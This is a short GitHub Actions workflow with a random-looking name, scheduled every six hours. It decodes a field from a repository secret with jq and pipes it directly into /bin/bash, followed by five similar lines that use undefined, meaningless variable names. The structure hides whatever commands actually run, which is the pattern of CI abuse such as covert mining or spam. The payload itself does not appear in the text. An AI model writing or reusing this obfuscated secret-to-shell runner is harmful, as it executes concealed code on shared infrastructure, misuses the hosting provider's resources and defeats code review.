name: fengfaming6789
on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengfaming6789
        env:
          bjv6: ${{ secrets.bjv6 }}
        run: |
          echo $bjv6 | jq -r .xczuc5 | /bin/bash
          echo $mhl7694 | jq -r .ev420 | /bin/bash
          echo $baynj04946 | jq -r .a3 | /bin/bash
          echo $i9 | jq -r .p114 | /bin/bash
          echo $m56 | jq -r .r23 | /bin/bash
          echo $opgon8 | jq -r .o8610 | /bin/bash

